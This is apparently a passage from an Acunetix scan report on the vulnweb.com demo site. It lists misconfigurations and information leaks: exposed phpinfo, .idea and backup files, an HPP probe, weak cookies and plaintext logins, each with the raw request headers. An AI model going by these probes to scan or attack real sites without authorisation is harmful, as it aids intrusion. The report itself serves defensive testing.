Referer: http://testphp.vulnweb.com/login.php
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
uname=test&pass=test
/userinfo.php
Details
Form name: form1
Form action: <empty>
Form method: POST
Form inputs:
<empty> [text]
ucc [text]
uemail [text]
uphone [text]
uaddress [textarea]
update [submit]
Request headers
138
POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Content-Length: 20
Pragma: no-cache
Cache-Control: no-cache
Origin: http://testphp.vulnweb.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
X-WVS-ID: Acunetix-LSR/65535
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,app
lication/signed-exchange;v=b3
Referer: http://testphp.vulnweb.com/login.php
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
uname=test&pass=test
Severity Medium
Reported by module /Scripts/PerScheme/HTTP_Parameter_Pollution.script
Description
HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If the web application does
not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either
clientside or server-side attacks.
Impact
139
Recommendation
The application should properly sanitize user input (URL encode) to protect against this vulnerability.
References
Affected items
/hpp/
Details
URL encoded GET input pp was set to 12&n925620=v920839
Parameter precedence: last occurrence
Affected link: params.php?p=valid&pp=12&n925620=v920839
Affected parameter: p=valid
Request headers
GET /hpp/?pp=12%26n925620=v920839 HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
Reported by module /Scripts/PerServer/Crossdomain_XML.script
Description
The browser security model normally prevents web content from one domain from accessing data from another domain.
This is commonly known as the "same origin policy". URL policy files grant cross-domain permissions for reading data.
They permit operations that are not permitted by default. The URL policy file is located, by default, in the root directory of
the target server, with the name crossdomain.xml (for example, at www.example.com/crossdomain.xml).
When a domain is specified in crossdomain.xml file, the site declares that it is willing to allow the operators of any servers
in that domain to obtain any document on the server where the policy file resides. The crossdomain.xml file deployed on
this website opens the server to all domains (use of a single asterisk "*" as a pure wildcard is supported) like so:
<cross-domain-policy>
</cross-domain-policy>
140
This practice is suitable for public servers, but should not be used for sites located behind a firewall because it could permit
access to protected areas. It should not be used for sites that require authentication in the form of passwords or cookies.
Sites that use the common practice of authentication based on cookies to access private or user-specific data should be
especially careful when using cross-domain policy files.
Impact
Using an insecure cross-domain policy file could expose your site to various attacks.
Recommendation
Carefully evaluate which sites will be allowed to make cross-domain calls. Consider network topology and any
authentication mechanisms that will be affected by the configuration or implementation of the cross-domain policy.
References
Affected items
Web Server
Details
The crossdomain.xml file is located at /crossdomain.xml.
Request headers
GET /crossdomain.xml HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
Reported by module /Scripts/PerFolder/JetBrains_Idea_Project_Directory.script
Description
The .idea directory contains a set of configuration files (.xml) for your project. These configuration files contain information
core to the project itself, such as names and locations of its component modules, compiler settings, etc. If you've defined a
data source the file dataSources.ids contains information for connecting to the database and credentials. The
workspace.xml file stores personal settings such as placement and positions of your windows, your VCS and History
settings, and other data pertaining to the development environment. It also contains a list of changed files and other
sensitive information. These files should not be present on a production system.
141
Impact
These files may expose sensitive information that may help an malicious user to prepare more advanced attacks.
Recommendation
Remove these files from production systems or restrict access to the .idea directory. To deny access to all the .idea folders
you need to add the following lines in the appropriate context (either global config, or vhost/directory, or from .htaccess):
<Directory ~ "\.idea">
Order allow,deny
</Directory>
References
Affected items
Web Server
Details
workspace.xml project file found at : /.idea/workspace.xml
Pattern found:
<project version="4">
Request headers
GET /.idea/workspace.xml HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
Reported by module /Scripts/PerFolder/PHPInfo.script
Description
142
The PHP configuration directive allow_url_fopen is enabled. When enabled, this directive allows data retrieval from remote
locations (web site or FTP server). A large number of code injection vulnerabilities reported in PHP-based web applications
are caused by the combination of enabling allow_url_fopen and bad input filtering.
Impact
Recommendation
You can disable allow_url_fopen from either php.ini (for PHP versions newer than 4.3.4) or .htaccess (for PHP versions up
to 4.3.4).
php.ini
allow_url_fopen = 'off'
.htaccess
php_flag allow_url_fopen off
References
Affected items
/secured/phpinfo.php
Verified vulnerability
Details
This vulnerability was detected using the information from phpinfo() page.
allow_url_fopen: On
Request headers
GET /secured/phpinfo.php HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
Reported by module /Scripts/PerFolder/PHPInfo.script
143
Description
Application error or warning messages may expose sensitive information about an application's internal workings to an
attacker.
Impact
Application error messages may disclose sensitive information which can be used to escalate attacks.
Recommendation
Adjust php.ini or .htaccess (mod_php with Apache HTTP Server) to disable display_errors (refer to 'Detailed
information' section).
References
Affected items
/secured/phpinfo.php
Verified vulnerability
Details
This vulnerability was detected using the information from phpinfo() page.
display_errors: On
Request headers
GET /secured/phpinfo.php HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
Reported by module /httpdata/acusensor.js
Description
144
Application error or warning messages may expose sensitive information about an application's internal workings to an
attacker.
Impact
Application error messages may disclose sensitive information which can be used to escalate attacks.
Recommendation
Adjust php.ini or .htaccess (mod_php with Apache HTTP Server) to disable display_errors (refer to 'Detailed
information' section).
References
Affected items
Web Server
Verified vulnerability
Details
Current setting is : display_errors = 1
Request headers
Severity Medium
Reported by module /Scripts/PerFolder/PHPInfo.script
Description
The open_basedir configuration directive will limit the files that can be opened by PHP to the specified directory-tree. When
a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is checked. When the file is outside
the specified directory-tree, PHP will refuse to open it. open_basedir is a good protection against remote file inclusion
vulnerabilities. For a remote attacker it is not possible to break out of the open_basedir restrictions if he is only able to inject
the name of a file to be included. Therefore the number of files he will be able to include with such a local file include
vulnerability is limited.
Impact
Recommendation
php.ini
open_basedir = your_application_directory
References
145
Affected items
/secured/phpinfo.php
Verified vulnerability
Details
This vulnerability was detected using the information from phpinfo() page.
open_basedir: no value
Request headers
GET /secured/phpinfo.php HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
Reported by module /Scripts/PerFolder/PHPInfo.script
Description
When use_only_cookies is disabled, PHP will pass the session ID via the URL. This makes the application more vulnerable
to session hijacking attacks. Session hijacking is basically a form of identity theft wherein a hacker impersonates a
legitimate user by stealing his session ID. When the session token is transmitted in a cookie, and the request is made on a
secure channel (that is, it uses SSL), the token is secure.
Impact
Recommendation
php.ini
session.use_only_cookies = 'on'
.htaccess
php_flag session.use_only_cookies on
References
146
Affected items
/secured/phpinfo.php
Verified vulnerability
Details
This vulnerability was detected using the information from phpinfo() page.
session.use_only_cookies: On
Request headers
GET /secured/phpinfo.php HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
PHPinfo page
Severity Medium
Reported by module /Scripts/PerFolder/PHPInfo.script
Description
PHPinfo page has been found in this directory. The PHPinfo page outputs a large amount of information about the current
state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information
and environment (if compiled as a module), the PHP environment, OS version information, paths, master and local values
of configuration options, HTTP headers, and the PHP License.
Impact
This file may expose sensitive information that may help an malicious user to prepare more advanced attacks.
Recommendation
References
Affected items
/secured/phpinfo.php
Verified vulnerability
Details
147
phpinfo() page found at : /secured/phpinfo.php.
Pattern found:
<title>phpinfo()</title>
Request headers
GET /secured/phpinfo.php HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
Reported by module /Scripts/PerFile/Text_Search_File.script
Description
This script is using phpinfo() function. This function outputs a large amount of information about the current state of PHP.
This includes information about PHP compilation options and extensions, the PHP version, server information and
environment (if compiled as a module), the PHP environment, OS version information, paths, master and local values of
configuration options, HTTP headers, and the PHP License.
Impact
This file may expose sensitive information that may help an malicious user to prepare more advanced attacks.
Recommendation
References
Affected items
/secured/phpinfo.php
Details
Pattern found:
<title>phpinfo()</title>
Request headers
148
GET /secured/phpinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
Reported by module /Scripts/PerFile/Text_Search_File.script
Description
Looks like the source code for this script is available. This check is using pattern matching to determine if server side tags
are found in the file. In some cases this alert may generate false positives.
Impact
An attacker can gather sensitive information (database connection strings, application logic) by analyzing the source code.
This information can be used to conduct further attacks.
Recommendation
Remove this file from your website or change its permissions to remove access.
Affected items
/index.bak
Details
149
This file was found using the pattern .
Original filename:
Pattern found:
Request headers
GET /index.bak HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/pictures/wp-config.bak
Details
150
This file was found using the pattern .
Original filename:
Pattern found:
<?php
// ** MySQL settings ** //
define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
// Change each KEY to a different unique phrase. You won't have to remember the phrases
// to get keys generated for you, or just make something up. Each key should have a diff
define('AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phrase.
define('SECURE_AUTH_KEY', 'put your unique phrase here'); // Change this to a unique phra
define('LOGGED_IN_KEY', 'put your unique phrase here'); // Change this to a unique phrase
// You can have multiple installations in one database if you give each a unique prefix
Request headers
151
GET /pictures/wp-config.bak HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Medium
Reported by module /Crawler/12-Crawler_User_Credentials_Plain_Text.js
Description
User credentials are transmitted over an unencrypted channel. This information should always be transferred via an
encrypted channel (HTTPS) to avoid being intercepted by malicious users.
Impact
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.
Recommendation
Because user credentials are considered sensitive information, should always be transferred to the server over an
encrypted connection (HTTPS).
Affected items
/login.php
Details
Form name: loginform
Form action: userinfo.php
Form method: POST
Request headers
152
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
X-WVS-ID: Acunetix-LSR/65535
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,app
lication/signed-exchange;v=b3
Referer: http://testphp.vulnweb.com/
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
/signup.php
Details
Form name: form1
Form action: /secured/newuser.php
Form method: POST
Request headers
GET /signup.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
153
WS_FTP log file found
Severity Medium
Reported by module /Scripts/PerFolder/WS_FTP_log_file.script
Description
WS_FTP is a popular FTP client. This application creates a log file named WS_FTP.LOG. This file contains sensitive data
such as file source/destination and file name, date/time of upload etc.
Impact
This file may expose sensitive information that may help an malicious user to prepare more advanced attacks.
Recommendation
Remove this file from your website or change its permissions to remove access.
References
ws_ftp.log (https://seclists.org/fulldisclosure/2004/Aug/703)
Affected items
/pictures/WS_FTP.LOG
Verified vulnerability
Details
Pattern found:
103.05.06 13:17
Request headers
GET /pictures/WS_FTP.LOG HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Low
Reported by module /Scripts/PerServer/Clickjacking_X_Frame_Options.script
154
Description
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user
into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential
information or taking control of their computer while clicking on seemingly innocuous web pages.
The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjacking
attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed
to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content is
not embedded into other sites.
Impact
Recommendation
Configure your web server to include an X-Frame-Options header and a CSP header with frame-ancestors directive.
Consult Web references for more information about the possible values for this header.
References
Affected items
Web Server
Details
Request headers
GET / HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Low
Reported by module /RPA/Cookie_Without_HttpOnly.js
Description
155
This cookie does not have the HttpOnly flag set. When a cookie is set with the HttpOnly flag, it instructs the browser that
the cookie can only be accessed by the server and not by client-side scripts. This is an important security protection for
session cookies.
Impact
Recommendation
If possible, you should set the HttpOnly flag for this cookie.
Affected items
Web Server
Verified vulnerability
Details
Set-Cookie: login=test%2Ftest
Request headers
POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Content-Length: 20
Pragma: no-cache
Cache-Control: no-cache
Origin: http://testphp.vulnweb.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
X-WVS-ID: Acunetix-LSR/65535
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,app
lication/signed-exchange;v=b3
Referer: http://testphp.vulnweb.com/login.php
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
uname=test&pass=test
156
Severity Low
Reported by module /RPA/Cookie_Without_Secure.js
Description
This cookie does not have the Secure flag set. When a cookie is set with the Secure flag, it instructs the browser that the
cookie can only be accessed over secure SSL/TLS channels. This is an important security protection for session cookies.
Impact
Recommendation
If possible, you should set the Secure flag for this cookie.
Affected items
Web Server
Verified vulnerability
Details
Set-Cookie: login=test%2Ftest
Request headers
157
POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Content-Length: 20
Pragma: no-cache
Cache-Control: no-cache
Origin: http://testphp.vulnweb.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
X-WVS-ID: Acunetix-LSR/65535
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,app
lication/signed-exchange;v=b3
Referer: http://testphp.vulnweb.com/login.php
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
uname=test&pass=test
Severity Low
Reported by module /Crawler/12-Crawler_Hidden_Input_Price.js
Description
A hidden form input named price was found. It's not recommended to hide sensitive information in hidden form fields.
Impact
Recommendation
Affected items
/product.php
Details
158
Form name: f_addcart
Form action: cart.php
Form method: POST
Form input:
price [hidden]
Request headers
GET /product.php?pic=1 HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Low
Reported by module /Scripts/PerFile/Text_Search_File.script
Description
For a client program to be able to connect to the MySQL server, it must use the proper connection parameters, such as the
name of the host where the server is running and the user name and password of your MySQL account.
When the connection to the database cannot be established, the server returns an error message including the MySQL
username and host that were used. This information should not be present on a production system.
Impact
This file may disclose sensitive information. This information can be used to launch further attacks.
Recommendation
Make sure the MySQL connection can be established and configure PHP not to display error messages.
Affected items
159
/Connections/DB_Connection.php
Details
Pattern found:
Request headers
GET /Connections/DB_Connection.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/secured/database_connect.php
Details
Pattern found:
Request headers
160
GET /secured/database_connect.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Low
Reported by module /Scripts/PerFolder/Possible_Sensitive_Files.script
Description
A possible sensitive file has been found. This file is not directly linked from the website. This check looks for common
sensitive resources like password files, configuration files, log files, include files, statistics data, database dumps. Each one
of these files could help an attacker to learn more about his target.
Impact
This file may expose sensitive information that could help a malicious user to prepare more advanced attacks.
Recommendation
References
Affected items
/hpp/test.php
Details
Request headers
161
GET /hpp/test.php HTTP/1.1
Accept: acunetix/wvs
Cookie: login=test%2Ftest
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Low
Reported by module /Scripts/PerServer/VirtualHost_Audit.script
Description
Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server (or
pool of servers). This allows one server to share its resources, such as memory and processor cycles, without requiring all
services provided to use the same host name.
This web server is responding differently when the Host header is manipulated and various common virtual hosts are
tested. This could indicate there is a Virtual Host present.
Impact
Recommendation
Consult the virtual host configuration and check if this virtual host should be publicly accessible.
References
Affected items
Web Server
Details
162
Virtual host: localhost
Response:
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>
Request headers
Unencrypted connection
Severity Low
Reported by module /RPA/no_https.js
Description
This scan target was connected to over an unencrypted connection. A potential attacker can intercept and modify data sent
and received from this site.
Impact
Recommendation
The site should send and receive data over a secure (HTTPS) connection.
Affected items
Web Server
Verified vulnerability
Details
Request headers
163
GET / HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Informational
Reported by module /httpdata/CSP_not_implemented.js
Description
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks,
including Cross Site Scripting (XSS) and data injection attacks.
Content Security Policy (CSP) can be implemented by adding a Content-Security-Policy header. The value of this header
is a string containing the policy directives describing your Content Security Policy. To implement CSP, you should define
lists of allowed origins for the all of the types of resources that your site utilizes. For example, if you have a simple site that
needs to load scripts, stylesheets, and images hosted locally, as well as from the jQuery library from their CDN, the CSP
header could look like the following:
Content-Security-Policy:
default-src 'self';
It was detected that your web application doesn't implement Content Security Policy (CSP) as the CSP header is missing
from the response. It's recommended to implement Content Security Policy (CSP) into your web application.
Impact
164
CSP can be used to prevent and/or mitigate attacks that involve content/code injection, such as cross-site scripting/XSS
attacks, attacks that require embedding a malicious resource, attacks that involve malicious use of iframes, such as
clickjacking attacks, and others.
Recommendation
It's recommended to implement Content Security Policy (CSP) into your web application. Configuring Content Security
Policy involves adding the Content-Security-Policy HTTP header to a web page and giving it values to control resources
the user agent is allowed to load for that page.
References
Affected items
Web Server
Details
Request headers
GET / HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Severity Informational
Reported by module /Scripts/PerFolder/Text_Search_Dir.script
Description
One or more email addresses have been found on this page. The majority of spam comes from email addresses harvested
off the internet. The spam-bots (also known as email harvesters and email extractors) are programs that scour the internet
looking for email addresses on any website they come across. Spambot programs look for strings like
myname@mydomain.com and then record any addresses found.
165
Impact
Recommendation
References
Affected items
Web Server
Details
Pattern found:
wvs@acunetix.com
Request headers
GET / HTTP/1.1
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
Web Server
Details
Pattern found:
wvs@acunetix.com
Request headers
166
GET / HTTP/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Connection: Keep-alive
/404.php
Details
Pattern found:
wvs@acunetix.com
Request headers
GET /404.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/artists.php
Details
Pattern found:
wvs@acunetix.com
Request headers
167
GET /artists.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/cart.php
Details
Pattern found:
wvs@acunetix.com
Request headers
GET /cart.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/categories.php
Details
168
Pattern found:
wvs@acunetix.com
Request headers
GET /categories.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/disclaimer.php
Details
Pattern found:
wvs@acunetix.com
Request headers
169
GET /disclaimer.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/guestbook.php
Details
Pattern found:
wvs@acunetix.com
Request headers
GET /guestbook.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/index.bak
Details
170
Pattern found:
wasp@acunetix.com
Request headers
GET /index.bak HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/index.php
Details
Pattern found:
wvs@acunetix.com
Request headers
171
GET /index.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/listproducts.php
Details
Pattern found:
wvs@acunetix.com
Request headers
GET /listproducts.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/login.php
Details
172
Pattern found:
wvs@acunetix.com
Request headers
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
X-WVS-ID: Acunetix-LSR/65535
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,app
lication/signed-exchange;v=b3
Referer: http://testphp.vulnweb.com/
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
/product.php
Details
Pattern found:
wvs@acunetix.com
Request headers
173
GET /product.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/search.php
Details
Pattern found:
wvs@acunetix.com
Request headers
GET /search.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/signup.php
Details
174
Pattern found:
wvs@acunetix.com
Request headers
GET /signup.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/Templates/main_dynamic_template.dwt.php
Details
Pattern found:
wvs@acunetix.com
Request headers
175
GET /Templates/main_dynamic_template.dwt.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: aspectalerts
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/userinfo.php
Details
Pattern found:
matheusdaocu@gmail.com
wvs@acunetix.com
Request headers
GET /userinfo.php HTTP/1.1
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://testphp.vulnweb.com/
